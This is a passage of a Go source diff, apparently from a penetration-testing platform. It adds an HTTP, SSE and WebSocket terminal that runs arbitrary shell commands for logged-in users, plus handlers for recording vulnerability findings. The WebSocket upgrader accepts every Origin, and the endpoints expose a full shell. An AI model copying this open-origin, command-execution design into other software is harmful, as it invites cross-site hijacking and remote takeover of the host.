func (m *AgentTaskManager) GetCompletedTasks() []*CompletedTask {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
// 清理过期记录(只读锁,不影响其他操作)
|
||||
// 注意:这里不能直接调用cleanupHistory,因为需要写锁
|
||||
// 所以返回时过滤过期记录
|
||||
now := time.Now()
|
||||
cutoffTime := now.Add(-m.historyRetention)
|
||||
|
||||
result := make([]*CompletedTask, 0, len(m.completedTasks))
|
||||
for _, task := range m.completedTasks {
|
||||
if task.CompletedAt.After(cutoffTime) {
|
||||
result = append(result, task)
|
||||
}
|
||||
}
|
||||
|
||||
// 按完成时间倒序排序(最新的在前)
|
||||
// 由于是追加的,最新的在最后,需要反转
|
||||
for i, j := 0, len(result)-1; i < j; i, j = i+1, j-1 {
|
||||
result[i], result[j] = result[j], result[i]
|
||||
}
|
||||
|
||||
// 限制返回数量
|
||||
if len(result) > m.maxHistorySize {
|
||||
result = result[:m.maxHistorySize]
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
@@ -0,0 +1,257 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"net/http"
|
||||
"os"
|
||||
"os/exec"
|
||||
"path/filepath"
|
||||
"runtime"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
const (
|
||||
terminalMaxCommandLen = 4096
|
||||
terminalMaxOutputLen = 256 * 1024 // 256KB
|
||||
terminalTimeout = 30 * time.Minute
|
||||
)
|
||||
|
||||
// TerminalHandler 处理系统设置中的终端命令执行
|
||||
type TerminalHandler struct {
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// maskTerminalCommand 对可能包含敏感信息的终端命令做脱敏,避免在日志中直接记录密码等内容
|
||||
func maskTerminalCommand(cmd string) string {
|
||||
trimmed := strings.TrimSpace(cmd)
|
||||
lower := strings.ToLower(trimmed)
|
||||
if strings.Contains(lower, "sudo") || strings.Contains(lower, "password") {
|
||||
return "[masked sensitive terminal command]"
|
||||
}
|
||||
if len(trimmed) > 256 {
|
||||
return trimmed[:256] + "..."
|
||||
}
|
||||
return trimmed
|
||||
}
|
||||
|
||||
// NewTerminalHandler 创建终端处理器
|
||||
func NewTerminalHandler(logger *zap.Logger) *TerminalHandler {
|
||||
return &TerminalHandler{logger: logger}
|
||||
}
|
||||
|
||||
// RunCommandRequest 执行命令请求
|
||||
type RunCommandRequest struct {
|
||||
Command string `json:"command"`
|
||||
Shell string `json:"shell,omitempty"`
|
||||
Cwd string `json:"cwd,omitempty"`
|
||||
}
|
||||
|
||||
// RunCommandResponse 执行命令响应
|
||||
type RunCommandResponse struct {
|
||||
Stdout string `json:"stdout"`
|
||||
Stderr string `json:"stderr"`
|
||||
ExitCode int `json:"exit_code"`
|
||||
Error string `json:"error,omitempty"`
|
||||
}
|
||||
|
||||
// RunCommand 执行终端命令(需登录)
|
||||
func (h *TerminalHandler) RunCommand(c *gin.Context) {
|
||||
var req RunCommandRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "请求体无效,需要 command 字段"})
|
||||
return
|
||||
}
|
||||
|
||||
cmdStr := strings.TrimSpace(req.Command)
|
||||
if cmdStr == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "command 不能为空"})
|
||||
return
|
||||
}
|
||||
if len(cmdStr) > terminalMaxCommandLen {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "命令过长"})
|
||||
return
|
||||
}
|
||||
|
||||
shell := req.Shell
|
||||
if shell == "" {
|
||||
if runtime.GOOS == "windows" {
|
||||
shell = "cmd"
|
||||
} else {
|
||||
shell = "sh"
|
||||
}
|
||||
}
|
||||
|
||||
ctx, cancel := context.WithTimeout(c.Request.Context(), terminalTimeout)
|
||||
defer cancel()
|
||||
|
||||
var cmd *exec.Cmd
|
||||
if runtime.GOOS == "windows" {
|
||||
cmd = exec.CommandContext(ctx, "cmd", "/c", cmdStr)
|
||||
} else {
|
||||
cmd = exec.CommandContext(ctx, shell, "-c", cmdStr)
|
||||
// 无 TTY 时设置 COLUMNS/TERM,使 ping 等工具的 usage 排版与真实终端一致
|
||||
cmd.Env = append(os.Environ(), "COLUMNS=256", "LINES=40", "TERM=xterm-256color")
|
||||
}
|
||||
|
||||
if req.Cwd != "" {
|
||||
absCwd, err := filepath.Abs(req.Cwd)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录无效"})
|
||||
return
|
||||
}
|
||||
cur, _ := os.Getwd()
|
||||
curAbs, _ := filepath.Abs(cur)
|
||||
rel, err := filepath.Rel(curAbs, absCwd)
|
||||
if err != nil || strings.HasPrefix(rel, "..") || rel == ".." {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录必须在当前进程目录下"})
|
||||
return
|
||||
}
|
||||
cmd.Dir = absCwd
|
||||
}
|
||||
|
||||
var stdout, stderr bytes.Buffer
|
||||
cmd.Stdout = &stdout
|
||||
cmd.Stderr = &stderr
|
||||
|
||||
err := cmd.Run()
|
||||
stdoutBytes := stdout.Bytes()
|
||||
stderrBytes := stderr.Bytes()
|
||||
|
||||
// 限制输出长度,防止内存占用过大(复制后截断,避免修改原 buffer)
|
||||
truncSuffix := []byte("\n...(输出已截断)\n")
|
||||
if len(stdoutBytes) > terminalMaxOutputLen {
|
||||
tmp := make([]byte, terminalMaxOutputLen+len(truncSuffix))
|
||||
n := copy(tmp, stdoutBytes[:terminalMaxOutputLen])
|
||||
copy(tmp[n:], truncSuffix)
|
||||
stdoutBytes = tmp
|
||||
}
|
||||
if len(stderrBytes) > terminalMaxOutputLen {
|
||||
tmp := make([]byte, terminalMaxOutputLen+len(truncSuffix))
|
||||
n := copy(tmp, stderrBytes[:terminalMaxOutputLen])
|
||||
copy(tmp[n:], truncSuffix)
|
||||
stderrBytes = tmp
|
||||
}
|
||||
|
||||
exitCode := 0
|
||||
if err != nil {
|
||||
if exitErr, ok := err.(*exec.ExitError); ok {
|
||||
exitCode = exitErr.ExitCode()
|
||||
} else {
|
||||
exitCode = -1
|
||||
}
|
||||
if ctx.Err() == context.DeadlineExceeded {
|
||||
so := strings.ReplaceAll(string(stdoutBytes), "\r\n", "\n")
|
||||
so = strings.ReplaceAll(so, "\r", "\n")
|
||||
se := strings.ReplaceAll(string(stderrBytes), "\r\n", "\n")
|
||||
se = strings.ReplaceAll(se, "\r", "\n")
|
||||
resp := RunCommandResponse{
|
||||
Stdout: so,
|
||||
Stderr: se,
|
||||
ExitCode: -1,
|
||||
Error: "命令执行超时(" + terminalTimeout.String() + ")",
|
||||
}
|
||||
c.JSON(http.StatusOK, resp)
|
||||
return
|
||||
}
|
||||
h.logger.Debug("终端命令执行异常", zap.String("command", maskTerminalCommand(cmdStr)), zap.Error(err))
|
||||
}
|
||||
|
||||
// 统一为 \n,避免前端因 \r 出现错位/对角线排版
|
||||
stdoutStr := strings.ReplaceAll(string(stdoutBytes), "\r\n", "\n")
|
||||
stdoutStr = strings.ReplaceAll(stdoutStr, "\r", "\n")
|
||||
stderrStr := strings.ReplaceAll(string(stderrBytes), "\r\n", "\n")
|
||||
stderrStr = strings.ReplaceAll(stderrStr, "\r", "\n")
|
||||
|
||||
resp := RunCommandResponse{
|
||||
Stdout: stdoutStr,
|
||||
Stderr: stderrStr,
|
||||
ExitCode: exitCode,
|
||||
}
|
||||
if err != nil && exitCode != 0 {
|
||||
resp.Error = err.Error()
|
||||
}
|
||||
c.JSON(http.StatusOK, resp)
|
||||
}
|
||||
|
||||
// streamEvent SSE 事件
|
||||
type streamEvent struct {
|
||||
T string `json:"t"` // "out" | "err" | "exit"
|
||||
D string `json:"d,omitempty"`
|
||||
C int `json:"c"` // exit code(不用 omitempty,否则 0 不序列化导致前端显示 [exit undefined])
|
||||
}
|
||||
|
||||
// RunCommandStream 流式执行命令,输出实时推送到前端(SSE)
|
||||
func (h *TerminalHandler) RunCommandStream(c *gin.Context) {
|
||||
var req RunCommandRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "请求体无效,需要 command 字段"})
|
||||
return
|
||||
}
|
||||
cmdStr := strings.TrimSpace(req.Command)
|
||||
if cmdStr == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "command 不能为空"})
|
||||
return
|
||||
}
|
||||
if len(cmdStr) > terminalMaxCommandLen {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "命令过长"})
|
||||
return
|
||||
}
|
||||
shell := req.Shell
|
||||
if shell == "" {
|
||||
if runtime.GOOS == "windows" {
|
||||
shell = "cmd"
|
||||
} else {
|
||||
shell = "sh"
|
||||
}
|
||||
}
|
||||
ctx, cancel := context.WithTimeout(c.Request.Context(), terminalTimeout)
|
||||
defer cancel()
|
||||
|
||||
var cmd *exec.Cmd
|
||||
if runtime.GOOS == "windows" {
|
||||
cmd = exec.CommandContext(ctx, "cmd", "/c", cmdStr)
|
||||
} else {
|
||||
cmd = exec.CommandContext(ctx, shell, "-c", cmdStr)
|
||||
cmd.Env = append(os.Environ(), "COLUMNS=256", "LINES=40", "TERM=xterm-256color")
|
||||
}
|
||||
if req.Cwd != "" {
|
||||
absCwd, err := filepath.Abs(req.Cwd)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录无效"})
|
||||
return
|
||||
}
|
||||
cur, _ := os.Getwd()
|
||||
curAbs, _ := filepath.Abs(cur)
|
||||
rel, err := filepath.Rel(curAbs, absCwd)
|
||||
if err != nil || strings.HasPrefix(rel, "..") || rel == ".." {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录必须在当前进程目录下"})
|
||||
return
|
||||
}
|
||||
cmd.Dir = absCwd
|
||||
}
|
||||
|
||||
c.Header("Content-Type", "text/event-stream")
|
||||
c.Header("Cache-Control", "no-cache")
|
||||
c.Header("Connection", "keep-alive")
|
||||
c.Header("X-Accel-Buffering", "no")
|
||||
c.Writer.WriteHeader(http.StatusOK)
|
||||
flusher, ok := c.Writer.(http.Flusher)
|
||||
if !ok {
|
||||
cancel()
|
||||
return
|
||||
}
|
||||
|
||||
sendEvent := func(ev streamEvent) {
|
||||
body, _ := json.Marshal(ev)
|
||||
c.SSEvent("", string(body))
|
||||
flusher.Flush()
|
||||
}
|
||||
|
||||
_ = runCommandStreamImpl(cmd, sendEvent, ctx)
|
||||
}
|
||||
@@ -0,0 +1,47 @@
|
||||
//go:build !windows
|
||||
|
||||
package handler
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"context"
|
||||
"os/exec"
|
||||
"strings"
|
||||
|
||||
"github.com/creack/pty"
|
||||
)
|
||||
|
||||
const ptyCols = 256
|
||||
const ptyRows = 40
|
||||
|
||||
// runCommandStreamImpl 在 Unix 下用 PTY 执行,使 ping 等命令按终端宽度排版(isatty 为真)
|
||||
func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) int {
|
||||
ptmx, err := pty.StartWithSize(cmd, &pty.Winsize{Cols: ptyCols, Rows: ptyRows})
|
||||
if err != nil {
|
||||
sendEvent(streamEvent{T: "exit", C: -1})
|
||||
return -1
|
||||
}
|
||||
defer ptmx.Close()
|
||||
|
||||
normalize := func(s string) string {
|
||||
s = strings.ReplaceAll(s, "\r\n", "\n")
|
||||
return strings.ReplaceAll(s, "\r", "\n")
|
||||
}
|
||||
sc := bufio.NewScanner(ptmx)
|
||||
for sc.Scan() {
|
||||
sendEvent(streamEvent{T: "out", D: normalize(sc.Text())})
|
||||
}
|
||||
exitCode := 0
|
||||
if err := cmd.Wait(); err != nil {
|
||||
if exitErr, ok := err.(*exec.ExitError); ok {
|
||||
exitCode = exitErr.ExitCode()
|
||||
} else {
|
||||
exitCode = -1
|
||||
}
|
||||
}
|
||||
if ctx.Err() == context.DeadlineExceeded {
|
||||
exitCode = -1
|
||||
}
|
||||
sendEvent(streamEvent{T: "exit", C: exitCode})
|
||||
return exitCode
|
||||
}
|
||||
@@ -0,0 +1,66 @@
|
||||
//go:build windows
|
||||
|
||||
package handler
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"context"
|
||||
"os/exec"
|
||||
"strings"
|
||||
"sync"
|
||||
)
|
||||
|
||||
// runCommandStreamImpl 在 Windows 下用 stdout/stderr 管道执行
|
||||
func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) int {
|
||||
stdoutPipe, err := cmd.StdoutPipe()
|
||||
if err != nil {
|
||||
sendEvent(streamEvent{T: "exit", C: -1})
|
||||
return -1
|
||||
}
|
||||
stderrPipe, err := cmd.StderrPipe()
|
||||
if err != nil {
|
||||
sendEvent(streamEvent{T: "exit", C: -1})
|
||||
return -1
|
||||
}
|
||||
if err := cmd.Start(); err != nil {
|
||||
sendEvent(streamEvent{T: "exit", C: -1})
|
||||
return -1
|
||||
}
|
||||
|
||||
normalize := func(s string) string {
|
||||
s = strings.ReplaceAll(s, "\r\n", "\n")
|
||||
return strings.ReplaceAll(s, "\r", "\n")
|
||||
}
|
||||
|
||||
var wg sync.WaitGroup
|
||||
wg.Add(2)
|
||||
go func() {
|
||||
defer wg.Done()
|
||||
sc := bufio.NewScanner(stdoutPipe)
|
||||
for sc.Scan() {
|
||||
sendEvent(streamEvent{T: "out", D: normalize(sc.Text())})
|
||||
}
|
||||
}()
|
||||
go func() {
|
||||
defer wg.Done()
|
||||
sc := bufio.NewScanner(stderrPipe)
|
||||
for sc.Scan() {
|
||||
sendEvent(streamEvent{T: "err", D: normalize(sc.Text())})
|
||||
}
|
||||
}()
|
||||
|
||||
wg.Wait()
|
||||
exitCode := 0
|
||||
if err := cmd.Wait(); err != nil {
|
||||
if exitErr, ok := err.(*exec.ExitError); ok {
|
||||
exitCode = exitErr.ExitCode()
|
||||
} else {
|
||||
exitCode = -1
|
||||
}
|
||||
}
|
||||
if ctx.Err() == context.DeadlineExceeded {
|
||||
exitCode = -1
|
||||
}
|
||||
sendEvent(streamEvent{T: "exit", C: exitCode})
|
||||
return exitCode
|
||||
}
|
||||
@@ -0,0 +1,111 @@
|
||||
//go:build !windows
|
||||
|
||||
package handler
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"net/http"
|
||||
"os"
|
||||
"os/exec"
|
||||
"time"
|
||||
|
||||
"github.com/creack/pty"
|
||||
"github.com/gin-gonic/gin"
|
||||
"github.com/gorilla/websocket"
|
||||
)
|
||||
|
||||
// terminalResize is sent by the frontend when the xterm.js terminal is resized.
|
||||
type terminalResize struct {
|
||||
Type string `json:"type"`
|
||||
Cols uint16 `json:"cols"`
|
||||
Rows uint16 `json:"rows"`
|
||||
}
|
||||
|
||||
// wsUpgrader 仅用于系统设置中的终端 WebSocket,会复用已有的登录保护(JWT 中间件在上层路由组)
|
||||
var wsUpgrader = websocket.Upgrader{
|
||||
CheckOrigin: func(r *http.Request) bool {
|
||||
// 由于已在 Gin 路由层做了认证,这里放宽 Origin,方便在同一域名下通过 HTTPS/WSS 访问
|
||||
return true
|
||||
},
|
||||
}
|
||||
|
||||
// RunCommandWS 提供真正交互式 Shell:基于 WebSocket + PTY 的长会话
|
||||
// 前端建立 WebSocket 连接后,所有键盘输入都会透传到 Shell,Shell 的输出也会实时写回前端。
|
||||
func (h *TerminalHandler) RunCommandWS(c *gin.Context) {
|
||||
conn, err := wsUpgrader.Upgrade(c.Writer, c.Request, nil)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
defer conn.Close()
|
||||
|
||||
// 启动交互式 Shell,这里优先使用 bash,找不到则退回 sh
|
||||
shell := "bash"
|
||||
if _, err := exec.LookPath(shell); err != nil {
|
||||
shell = "sh"
|
||||
}
|
||||
cmd := exec.Command(shell)
|
||||
cmd.Env = append(os.Environ(),
|
||||
"COLUMNS=80",
|
||||
"LINES=24",
|
||||
"TERM=xterm-256color",
|
||||
)
|
||||
|
||||
// Use 80x24 as a safe default; the frontend will send the actual size immediately after connecting.
|
||||
ptmx, err := pty.StartWithSize(cmd, &pty.Winsize{Cols: 80, Rows: 24})
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
defer ptmx.Close()
|
||||
|
||||
// Shell -> WebSocket:将 PTY 输出实时发给前端
|
||||
doneChan := make(chan struct{})
|
||||
go func() {
|
||||
buf := make([]byte, 4096)
|
||||
for {
|
||||
n, err := ptmx.Read(buf)
|
||||
if n > 0 {
|
||||
_ = conn.WriteMessage(websocket.BinaryMessage, buf[:n])
|
||||
}
|
||||
if err != nil {
|
||||
break
|
||||
}
|
||||
}
|
||||
close(doneChan)
|
||||
}()
|
||||
|
||||
// WebSocket -> Shell:将前端输入写入 PTY(包括 sudo 密码、Ctrl+C 等)
|
||||
conn.SetReadLimit(64 * 1024)
|
||||
_ = conn.SetReadDeadline(time.Now().Add(terminalTimeout))
|
||||
conn.SetPongHandler(func(string) error {
|
||||
_ = conn.SetReadDeadline(time.Now().Add(terminalTimeout))
|
||||
return nil
|
||||
})
|
||||
|
||||
for {
|
||||
msgType, data, err := conn.ReadMessage()
|
||||
if err != nil {
|
||||
_ = cmd.Process.Kill()
|
||||
break
|
||||
}
|
||||
if msgType != websocket.TextMessage && msgType != websocket.BinaryMessage {
|
||||
continue
|
||||
}
|
||||
if len(data) == 0 {
|
||||
continue
|
||||
}
|
||||
// Check if this is a resize message (JSON with type:"resize")
|
||||
if msgType == websocket.TextMessage && len(data) > 0 && data[0] == '{' {
|
||||
var resize terminalResize
|
||||
if json.Unmarshal(data, &resize) == nil && resize.Type == "resize" && resize.Cols > 0 && resize.Rows > 0 {
|
||||
_ = pty.Setsize(ptmx, &pty.Winsize{Cols: resize.Cols, Rows: resize.Rows})
|
||||
continue
|
||||
}
|
||||
}
|
||||
if _, err := ptmx.Write(data); err != nil {
|
||||
_ = cmd.Process.Kill()
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
<-doneChan
|
||||
}
|
||||
@@ -0,0 +1,533 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/http"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// VulnerabilityHandler 漏洞处理器
|
||||
type VulnerabilityHandler struct {
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *VulnerabilityHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewVulnerabilityHandler 创建新的漏洞处理器
|
||||
func NewVulnerabilityHandler(db *database.DB, logger *zap.Logger) *VulnerabilityHandler {
|
||||
return &VulnerabilityHandler{
|
||||
db: db,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// CreateVulnerabilityRequest 创建漏洞请求
|
||||
type CreateVulnerabilityRequest struct {
|
||||
ConversationID string `json:"conversation_id" binding:"required"`
|
||||
ProjectID string `json:"project_id"`
|
||||
ConversationTag string `json:"conversation_tag"`
|
||||
TaskTag string `json:"task_tag"`
|
||||
Title string `json:"title" binding:"required"`
|
||||
Description string `json:"description"`
|
||||
Severity string `json:"severity" binding:"required"`
|
||||
Status string `json:"status"`
|
||||
Type string `json:"type"`
|
||||
Target string `json:"target"`
|
||||
Proof string `json:"proof"`
|
||||
Impact string `json:"impact"`
|
||||
Recommendation string `json:"recommendation"`
|
||||
}
|
||||
|
||||
// CreateVulnerability 创建漏洞
|
||||
func (h *VulnerabilityHandler) CreateVulnerability(c *gin.Context) {
|
||||
var req CreateVulnerabilityRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
vuln := &database.Vulnerability{
|
||||
ConversationID: req.ConversationID,
|
||||
ProjectID: strings.TrimSpace(req.ProjectID),
|
||||
ConversationTag: req.ConversationTag,
|
||||
TaskTag: req.TaskTag,
|
||||
Title: req.Title,
|
||||
Description: req.Description,
|
||||
Severity: req.Severity,
|
||||
Status: req.Status,
|
||||
Type: req.Type,
|
||||
Target: req.Target,
|
||||
Proof: req.Proof,
|
||||
Impact: req.Impact,
|
||||
Recommendation: req.Recommendation,
|
||||
}
|
||||
|
||||
created, err := h.db.CreateVulnerability(vuln)
|
||||
if err != nil {
|
||||
h.logger.Error("创建漏洞失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "vulnerability", "create", "创建漏洞记录", "vulnerability", created.ID, map[string]interface{}{
|
||||
"severity": created.Severity, "title": created.Title,
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, created)
|
||||
}
|
||||
|
||||
// GetVulnerability 获取漏洞
|
||||
func (h *VulnerabilityHandler) GetVulnerability(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
vuln, err := h.db.GetVulnerability(id)
|
||||
if err != nil {
|
||||
h.logger.Error("获取漏洞失败", zap.Error(err))
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "漏洞不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, vuln)
|
||||
}
|
||||
|
||||
// ListVulnerabilitiesResponse 漏洞列表响应
|
||||
type ListVulnerabilitiesResponse struct {
|
||||
Vulnerabilities []*database.Vulnerability `json:"vulnerabilities"`
|
||||
Total int `json:"total"`
|
||||
Page int `json:"page"`
|
||||
PageSize int `json:"page_size"`
|
||||
TotalPages int `json:"total_pages"`
|
||||
}
|
||||
|
||||
func parseVulnerabilityListFilter(c *gin.Context) database.VulnerabilityListFilter {
|
||||
q := strings.TrimSpace(c.Query("q"))
|
||||
if q == "" {
|
||||
q = strings.TrimSpace(c.Query("search"))
|
||||
}
|
||||
return database.VulnerabilityListFilter{
|
||||
ProjectID: c.Query("project_id"),
|
||||
ID: c.Query("id"),
|
||||
Search: q,
|
||||
ConversationID: c.Query("conversation_id"),
|
||||
Severity: c.Query("severity"),
|
||||
Status: c.Query("status"),
|
||||
TaskID: c.Query("task_id"),
|
||||
ConversationTag: c.Query("conversation_tag"),
|
||||
TaskTag: c.Query("task_tag"),
|
||||
}
|
||||
}
|
||||
|
||||
// ListVulnerabilities 列出漏洞
|
||||
func (h *VulnerabilityHandler) ListVulnerabilities(c *gin.Context) {
|
||||
limitStr := c.DefaultQuery("limit", "20")
|
||||
offsetStr := c.DefaultQuery("offset", "0")
|
||||
pageStr := c.Query("page")
|
||||
filter := parseVulnerabilityListFilter(c)
|
||||
|
||||
limit, _ := strconv.Atoi(limitStr)
|
||||
offset, _ := strconv.Atoi(offsetStr)
|
||||
page := 1
|
||||
|
||||
// 如果提供了page参数,优先使用page计算offset
|
||||
if pageStr != "" {
|
||||
if p, err := strconv.Atoi(pageStr); err == nil && p > 0 {
|
||||
page = p
|
||||
offset = (page - 1) * limit
|
||||
}
|
||||
}
|
||||
|
||||
if limit <= 0 || limit > 100 {
|
||||
limit = 20
|
||||
}
|
||||
if offset < 0 {
|
||||
offset = 0
|
||||
}
|
||||
|
||||
// 获取总数
|
||||
total, err := h.db.CountVulnerabilities(filter)
|
||||
if err != nil {
|
||||
h.logger.Error("获取漏洞总数失败", zap.Error(err))
|
||||
// 继续执行,使用0作为总数
|
||||
total = 0
|
||||
}
|
||||
|
||||
// 获取漏洞列表
|
||||
vulnerabilities, err := h.db.ListVulnerabilities(limit, offset, filter)
|
||||
if err != nil {
|
||||
h.logger.Error("获取漏洞列表失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 计算总页数
|
||||
totalPages := (total + limit - 1) / limit
|
||||
if totalPages == 0 {
|
||||
totalPages = 1
|
||||
}
|
||||
|
||||
// 如果使用offset计算page,需要重新计算
|
||||
if pageStr == "" {
|
||||
page = (offset / limit) + 1
|
||||
}
|
||||
|
||||
response := ListVulnerabilitiesResponse{
|
||||
Vulnerabilities: vulnerabilities,
|
||||
Total: total,
|
||||
Page: page,
|
||||
PageSize: limit,
|
||||
TotalPages: totalPages,
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, response)
|
||||
}
|
||||
|
||||
// UpdateVulnerabilityRequest 更新漏洞请求
|
||||
type UpdateVulnerabilityRequest struct {
|
||||
ProjectID *string `json:"project_id"`
|
||||
ConversationTag string `json:"conversation_tag"`
|
||||
TaskTag string `json:"task_tag"`
|
||||
Title string `json:"title"`
|
||||
Description string `json:"description"`
|
||||
Severity string `json:"severity"`
|
||||
Status string `json:"status"`
|
||||
Type string `json:"type"`
|
||||
Target string `json:"target"`
|
||||
Proof string `json:"proof"`
|
||||
Impact string `json:"impact"`
|
||||
Recommendation string `json:"recommendation"`
|
||||
}
|
||||
|
||||
// UpdateVulnerability 更新漏洞
|
||||
func (h *VulnerabilityHandler) UpdateVulnerability(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
var req UpdateVulnerabilityRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取现有漏洞
|
||||
existing, err := h.db.GetVulnerability(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "漏洞不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 更新字段
|
||||
if req.ProjectID != nil {
|
||||
existing.ProjectID = strings.TrimSpace(*req.ProjectID)
|
||||
}
|
||||
if req.ConversationTag != "" {
|
||||
existing.ConversationTag = req.ConversationTag
|
||||
}
|
||||
if req.TaskTag != "" {
|
||||
existing.TaskTag = req.TaskTag
|
||||
}
|
||||
if req.Title != "" {
|
||||
existing.Title = req.Title
|
||||
}
|
||||
if req.Description != "" {
|
||||
existing.Description = req.Description
|
||||
}
|
||||
if req.Severity != "" {
|
||||
existing.Severity = req.Severity
|
||||
}
|
||||
if req.Status != "" {
|
||||
existing.Status = req.Status
|
||||
}
|
||||
if req.Type != "" {
|
||||
existing.Type = req.Type
|
||||
}
|
||||
if req.Target != "" {
|
||||
existing.Target = req.Target
|
||||
}
|
||||
if req.Proof != "" {
|
||||
existing.Proof = req.Proof
|
||||
}
|
||||
if req.Impact != "" {
|
||||
existing.Impact = req.Impact
|
||||
}
|
||||
if req.Recommendation != "" {
|
||||
existing.Recommendation = req.Recommendation
|
||||
}
|
||||
|
||||
if err := h.db.UpdateVulnerability(id, existing); err != nil {
|
||||
h.logger.Error("更新漏洞失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 返回更新后的漏洞
|
||||
updated, err := h.db.GetVulnerability(id)
|
||||
if err != nil {
|
||||
h.logger.Error("获取更新后的漏洞失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "vulnerability", "update", "更新漏洞记录", "vulnerability", id, map[string]interface{}{
|
||||
"severity": updated.Severity, "status": updated.Status, "project_id": updated.ProjectID,
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, updated)
|
||||
}
|
||||
|
||||
// DeleteVulnerability 删除漏洞
|
||||
func (h *VulnerabilityHandler) DeleteVulnerability(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
if err := h.db.DeleteVulnerability(id); err != nil {
|
||||
h.logger.Error("删除漏洞失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if h.audit != nil {
|
||||
h.audit.Record(c, audit.Entry{
|
||||
Category: "vulnerability",
|
||||
Action: "delete",
|
||||
Result: "success",
|
||||
ResourceType: "vulnerability",
|
||||
ResourceID: id,
|
||||
Message: "删除漏洞记录",
|
||||
})
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "删除成功"})
|
||||
}
|
||||
|
||||
// BatchDeleteVulnerabilities 按当前筛选条件批量删除漏洞
|
||||
func (h *VulnerabilityHandler) BatchDeleteVulnerabilities(c *gin.Context) {
|
||||
filter := parseVulnerabilityListFilter(c)
|
||||
|
||||
total, err := h.db.CountVulnerabilities(filter)
|
||||
if err != nil {
|
||||
h.logger.Error("统计待删除漏洞失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if total == 0 {
|
||||
c.JSON(http.StatusOK, gin.H{"message": "当前筛选条件下没有可删除的漏洞", "deleted": 0})
|
||||
return
|
||||
}
|
||||
|
||||
deleted, err := h.db.DeleteVulnerabilitiesByFilter(filter)
|
||||
if err != nil {
|
||||
h.logger.Error("批量删除漏洞失败", zap.Error(err), zap.Int("count", total))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "vulnerability", "delete_batch", "批量删除漏洞记录", "vulnerability", "", map[string]interface{}{
|
||||
"deleted": deleted,
|
||||
"filter": filter,
|
||||
})
|
||||
}
|
||||
|
